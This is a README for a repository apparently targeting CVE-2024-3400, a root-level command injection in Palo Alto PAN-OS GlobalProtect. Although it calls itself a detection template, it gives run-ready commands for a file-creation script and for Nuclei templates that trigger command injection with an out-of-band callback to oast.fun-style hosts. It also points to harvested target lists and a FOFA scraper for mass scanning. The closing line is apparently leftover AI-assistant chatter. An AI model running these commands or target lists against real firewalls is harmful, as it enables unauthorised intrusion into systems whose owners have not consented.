A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
This repository contains a Nuclei Template designed to detect vulnerabilities related to Palo Alto PAN-OS bugs, specifically targeting CVE-2024-3400.
A comprehensive list of research was done by
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
- 0 Byte File Creation: This vulnerability allows for the creation of a 0-byte file via a Curl request in a Bash file.
- OS Command Injection: The Nuclei Template detects potential OS command injection vulnerabilities.
Execute the following command to run the Bash script:
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://targetThe script will check if a file is created (returning a 200 OK status). If successful, it will then verify if the file exists (returning a 403 Forbidden status).
- Start an Interact Server:
interactsh-client -v- Run the Nuclei Template:
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug- Boom Boom Template! (GET subdomain from https://dig.pm)
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.orgA list of potential targets can be found here.
python fofax3r.py- Author: 자전거, 自転車, 自行车
This README.md provides information on the vulnerability, how to use the provided scripts, potential targets, and credits the author. Let me know if you need any further adjustments!